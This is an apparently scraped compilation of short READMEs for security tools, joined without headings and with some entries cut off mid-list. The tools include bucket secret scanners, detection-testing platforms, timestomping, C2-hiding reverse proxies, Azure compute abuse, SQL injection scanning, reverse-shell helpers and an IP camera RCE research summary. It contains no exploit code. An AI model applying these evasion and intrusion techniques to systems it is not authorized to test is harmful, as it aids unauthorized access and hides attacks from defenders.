The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.
BucketLoot comes with a guest mode by default, which means a user doesn't needs to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response and if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.
Features
Secret Scanning
Scans for over 80+ unique RegEx signatures that can help in uncovering secret exposures tagged with their severity from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!
Sensitive File Checks
Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a 80+ unique regEx signatures list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.
Dig Mode
Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.
Asset Extraction
Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.
Searching
The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.
With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.
To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project which allows to simulate attacks following MITRE TTPs (Tactics, Techniques, and Procedures). PurpleKeep enhances the simulation of these TTPs to serve as a starting point for the evaluation of the effectiveness of detection rules.
Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.
Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.
To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.
TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.
Requirements
The project is based on Azure Pipelines and requires the following to be able to run:
Azure Service Connection to a resource group as described in the Microsoft Docs
Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application
MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and make it accessible to the pipelines
Optional
You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.
Refer to the variables file for your configurable items.
Design
Infrastructure
Deploying the infrastructure uses the Azure Pipeline to perform the following steps:
Deploy Azure services:
Key Vault
Log Analytics Workspace
Data Connection Endpoint
Data Connection Rule
Generate SSH keypair and password for the Windows account and store in the Key Vault
Create a Windows 11 VM
Install OpenSSH
Configure and deploy the SSH public key
Install Invoke-AtomicRedTeam
Install Microsoft Defender for Endpoint and configure exceptions
Currently only the Atomics from the public repository are supported. The pipelines takes a Technique ID as input or a comma seperate list of techniques, for example:
T1059.003
T1027,T1049,T1003
The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.
There are currently two ways to run the simulation:
A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTP's will be simulated on this instance. This is the fastests way to simulate and prevents onboarding a large number of devices, however running a lot of simulations in a same environment has the risk of contaminating the environment and making the simulations less stable and predictable.
TODO
Must have
Check if pre-reqs have been fullfilled before executing the atomic
Provide the ability to import own group policy
Cleanup biceps and pipelines by using a master template (Complete build)
Build pipeline that runs technique sequently with reboots in between
Add Azure ServiceConnection to variables instead of parameters
Nice to have
MDE Off-boarding (?)
Automatically join and leave AD domain
Make Atomics repository configureable
Deploy VECTR as part of the infrastructure and ingest results during simulation. Also see the VECTR API issue
Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)
Add C2 infrastructure for manual or C2 based simulations
Issues
Atomics do not return if a simulation succeeded or not
A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.
Change timestamps for individual files or directories.
Recursively apply timestamps to all files in a directory.
Option to use specific credentials for remote paths or privileged files.
I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.
Tool for analyzing SAP Secure Network Communications (SNC).
How to use?
In its current state, sncscan can be used to read the SNC configurations for SAP Router and DIAG (SAP GUI) connections. The implementation for the SAP RFC protocol is currently in development.
SAP Router
SAP Routers can either support SNC or not, a more granular configuration of the SNC parameters is not possible. Nevertheless, sncscan find out if it is activated:
sncscan -H 10.3.161.4 -S 3299 -p router
DIAG / SAP GUI
The SNC configuration of a DIAG connection used by a SAP GUI can have more versatile settings than the router configuration. A detailled overview of the system parameterss that can be read with sncscan and impact the connections security is in the section Background
Requirements: Currently the sncscan only works with the pysap libary from our fork.
python3 -m pip install -r requirements.txt
or
python3 setup.py test
python3 setup.py install
Background: SNC system parameters
SNC Basics
SAP protocols, such as DIAG or RFC, do not provide high security themselves. To increase security and ensure Authentication, Integrity and Encryption, the use of SNC (Secure Network Communications) is required. SNC protects the data communication paths between various client and server components of the SAP system that use the RFC, DIAG or router protocol by applying known cryptographic algorithms to the data in order to increase its security. There are three different levels of data protection, that can be applied for an SNC secured connection:
Authentication only: Verifies the identity of the communication partners
Confidentiality protection: Encrypts the transmitted messages
SNC Parameter
Each SAP system can be configured with SNC parameters for the communication security. The level of the SNC connection is determined by the Quality of Protection parameters:
snc/data_protection/min: Minimum security level required for SNC connections.
snc/data_protection/max: highest security level, initiated by the SAP system
snc/data_protection/use: default security level, initiated from the SAP system
Additional SNC parameters can be used for further system-specific configuration options, including the snc/only_encrypted_gui parameter, which ensures that encrypted SAPGUI connections are enforced.
Reading out SNC Parameters
As long as a SAP System is addressed that is capable of sending SNC messages, it also responds to valid SNC requests, regardless of which IP, port, and CN were specified for SNC. This response contains the requirements that the SAP system has for the SNC connection, which can then be used to obtain the SNC parameters. This can be used to find out whether an SAP system has SNC enabled and, if so, which SNC parameters have been set.
MELEE: A Tool to Detect Ransomware Infections in MySQL Instances
Attackers are abusing MySQL instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MySQL instances and triggering infections at scale to exfiltrate data, destruct data, and extort money via ransom. For example one of the significant threats MySQL deployments face is ransomware. We have authored a tool named "MELEE" to detect potential infections in MySQL instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected MySQL instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases. In this release of the tool, the following modules are supported:
Nemesis is an offensive data enrichmentpipeline and operator support system.
Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.
Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operatorsβ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.
Nemesis is built on large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we're forgotten proper credit anywhere, please let us know or submit a pull request!
We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.
This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.
Visit our website - secureci.org for more information.
Features
Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.
Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.
Usage
This Python script provides a command line interface for interacting with GitHub repositories and GitHub actions.
This would run the script in repo mode on the master branch of the specified repository.
How to use
Argus can be run inside a docker container. To do so, follow the steps:
Install docker and docker-compose
apt-get -y install docker.io docker-compose
Clone the release branch of this repo
git clone <>
Build the docker container
docker-compose build
Now you can run argus. Example run:
docker-compose run argus --mode {mode} --url {url to target repo}
Results will be available inside the results folder
Viewing SARIF Results
You can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.
Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif) directly to the website to view the results.
VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.
Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.
Troubleshooting
If there is an issue with needing the Github authorization for running, you can provide username:TOKEN in the GITHUB_CREDS environment variable. This will be used for all the requests made to Github. Note, we do not store this information anywhere, neither create any thing in the Github account - we only use this for cloning the repositories.
Contributions
Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!
Cite Argus
If you use Argus in your research, please cite our paper:
@inproceedings{muralee2023Argus, title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions}, author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck, A. Kapravelos, A. Machiry}, booktitle={32st USENIX Security Symposium (USENIX Security 23)}, year={2023}, }
navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities
Techniques
Currently, navgix supports 2 techniques for finding vulnerable directories (or location aliases). Those being the following:
Heuristics
navgix will make an initial GET request to the page, and if there are any directories specified on the page HTML (specified in src attributes on html components), it will test each folder in the path for the vulnerability, therefore if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.
Brute-force
navgix will also test for a short list of common directories that are common to have this vulnerability and if any of these directories exist, it will also attempt to confirm if a vulnerability is present.
Installation
git clone https://github.com/Hakai-Offsec/navgix; cd navgix; go build
Optional Arguments: /threads - specify maximum number of parallel threads (default=25) /dc - specify domain controller to query (if not ran on a domain-joined host) /domain - specify domain name (if not ran on a domain-joined host) /ldap - query hosts from the following LDAP filters (default=all) :all - All enabled computers with 'primary' group 'Domain Computers' :dc - All enabled Domain Controllers (not read-only DCs) :exclude-dc - All enabled computers that are not Domain Controllers or read-only DCs :servers - All enabled servers :servers-exclude-dc - All enabled servers excluding Domain Controllers or read-only DCs /ou - specify LDAP OU to query enabled computer objects from ex: "OU=Special Servers,DC=example,DC=local" /stealth - list share names without performing read/write access checks /filter - list of comma-separated shares to exclude from enumeration default: SYSVOL,NETLOGON,IPC$,PRINT$ /outfile - specify file for shares to be appended to instead of printing to std out /verbose - return unauthorized shares
BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors.
The tool is distributed with preconfigured lists of blocked words, blocked and allowed IP addresses.
For more information on tool usage, you may visit project's wiki.
Features
Highly configurable and customizable filters pipeline with boolean-based concatenation of rules will be able to hide your infrastructure from the most keen blue eyes.
Easily extendable project structure, everyone can add rules for their own C2.
Integrated and curated massive blacklist of IPv4 pools and ranges known to be associated with IT Security vendors combined with IP filter to disallow them to use/attack your infrastructure.
Malleable C2 Profile parser is able to validate inbound HTTP(s) traffic against the Malleable's config and reject invalidated packets.
Out of the box domain fronting support allows you to hide your infrastructure a little bit more.
Ability to check the IPv4 address of request against IP Geolocation/reverse lookup data and compare it to specified regular expressions to exclude out peers connecting outside allowed companies, nations, cities, domains, etc.
All incoming requests may be allowed/disallowed for any time period, so you may configure work time filters.
Support for multiple proxies with different filter pipelines at one BounceBack instance.
Verbose logging mechanism allows you to keep track of all incoming requests and events for analyzing blue team behaviour and debug issues.
Rules
BounceBack currently supports the following filters:
Faradayβs researchers Javier Aguinaga and Octavio Gianatiempo have investigated on IP cameras and two high severity vulnerabilities.
This research project began when Aguinaga's wife, a former Research leader at Faraday Security, informed him that their IP camera had stopped working. Although Javier was initially asked to fix it, being a security researcher, opted for a more unconventional approach to tackle the problem. He brought the camera to their office and discussed the issue with Gianatiempo, another security researcher at Faraday. The situation quickly escalated from some light reverse engineering to a full-fledged vulnerability research project, which ended with two high-severity bugs and an exploitation strategy worthy of the big screen.
They uncovered two LAN remote code execution vulnerabilities in EZVIZβs implementation of Hikvisionβs Search Active Devices Protocol (SADP) and SDK server:
CVE-2023-34551: EZVIZβs implementation of Hikvisionβs SDK server post-auth stack buffer overflows (CVSS3 8.0 - HIGH)
The affected code is present in several EZVIZ products, which include but are not limited to:
Product Model
Affected Versions
CS-C6N-B0-1G2WF
Versions below V5.3.0 build 230215
CS-C6N-R101-1G2WF
Versions below V5.3.0 build 230215
CS-CV310-A0-1B2WFR
Versions below V5.3.0 build 230221
CS-CV310-A0-1C2WFR-C
Versions below V5.3.2 build 230221
CS-C6N-A0-1C2WFR-MUL
Versions below V5.3.2 build 230218
CS-CV310-A0-3C2WFRL-1080p
Versions below V5.2.7 build 230302
CS-CV310-A0-1C2WFR Wifi IP66 2.8mm 1080p
Versions below V5.3.2 build 230214
CS-CV248-A0-32WMFR
Versions below V5.2.3 build 230217
EZVIZ LC1C
Versions below V5.3.4 build 230214
These vulnerabilities affect IP cameras and can be used to execute code remotely, so they drew inspiration from the movies and decided to recreate an attack often seen in heist films. The hacker in the group is responsible for hijacking the cameras and modifying the feed to avoid detection. Take, for example, this famous scene from Oceanβs Eleven:
Exploiting either of these vulnerabilities, Javier and Octavio served a victim an arbitrary video stream by tunneling their connection with the camera into an attacker-controlled server while leaving all other camera features operational.
A deep detailed dive into the whole research process, can be found in these slides and code. It covers firmware analysis, vulnerability discovery, building a toolchain to compile a debugger for the target, developing an exploit capable of bypassing ASLR. Plus, all the details about the Hollywood-style post-exploitation, including tracing, in memory code patching and manipulating the execution of the binary that implements most of the camera features.
This research shows that memory corruption vulnerabilities still abound on embedded and IoT devices, even on products marketed for security applications like IP cameras. Memory corruption vulnerabilities can be detected by static analysis, and implementing secure development practices can reduce their occurrence. These approaches are standard in other industries, evidencing that security is not a priority for embedded and IoT device manufacturers, even when developing security-related products. By filling the gap between IoT hacking and the big screen, this research questions the integrity of video surveillance systems and hopes to raise awareness about the security risks posed by these kinds of devices.
Execute code within Azure Automation service without getting charged
Description
CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.
This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". As for 3/9/23, this tool can still be used without getting charged.
Each execution is limited to 3 hours
Requirements
Python 3.8+ with the libraries mentioned in the file requirements.txt
CloudMiner - Free computing power in Azure Automation Service
optional arguments: -h, --help show this help message and exit --path PATH the script path (Powershell or Python) --id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/a utomationAccounts/{automationAccountName} -c COUNT, --count COUNT number of executions -t TOKEN, --token TOKEN Azure access token (optional). If not provided, token will be retrieved using the Azure CLI -r REQUIREMENTS, --requirements REQUIREMENTS Path to requirements file to be installed and use by the script (relevant to Python scripts only) -v, --verbose Enable verbose mode
Example usage
Python
Powershell
License
CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.
SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threaded, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminates false positives through and send alerts upon detection, with the built-in Discord notification functionality.
options: -h, --help show this help message and exit -u URL, --url URL Single URL for the target -r URLS_FILE, --urls_file URLS_FILE File containing a list of URLs -p, --pipeline Read from pipeline --proxy PROXY Proxy for intercepting requests (e.g., http://127.0.0.1:8080) --payload PAYLOAD File containing malicious payloads (default is payloads.txt) --single-payload SINGLE_PAYLOAD Single payload for testing --discord DISCORD Discord Webhook URL --headers HEADERS File containing headers (default is headers.txt) --threads THREADS Number of threads
Running SqliSniper
Single Url Scan
The url can be provided with -u flag for single site scan
./sqlisniper.py -u http://example.com
File Input
The -r flag allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.
./sqlisniper.py -r url.txt
piping URLs
The SqliSniper can also worked with the pipeline input with -p flag
cat url.txt | ./sqlisniper.py -p
The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.
While using the custom payloads file, ensure that you substitute the sleep time with %__TIME_OUT__%. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this.
SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.
Note: It is crucial to consider that employing a higher number of threads might lead to potential false positives or overlooking valid issues. Due to the nature of time-based SQL injection it is recommended to use lower thread for more accurate detection.
SqliSniper is made inΒ pythonΒ with lots of <3 by @Muhammad Danial.
Essential utilities for pentester, bug-bounty hunters and security researchers
secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).
The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!
Essential utilities for pentester, bug-bounty hunters and security researchers
Usage: secbutler [flags] secbutler [command]
Available Commands: cheatsheet Read common cheatsheets & payloads help Help about any command listener Obtain the command to start a reverse shell listener payloads Obtain and serve common payloads proxy Obtain a random proxy from FreeProxy revshell Obtain the command for a reverse shell tools Generate a install script for the most common cybersecurity tools version Print the current version wordlists Generate a download script for the most common wordlists
Flags: -h, --help help for secbutler
Use "secbutler [command] --help" for more information about a command.
Installation
Run the following command to install the latest version:
go install github.com/groundsec/secbutler@latest
Or you can simply grab an executable from the Releases page.
License
secbutler is made with π€ by the GroundSec team and released under the MIT LICENSE.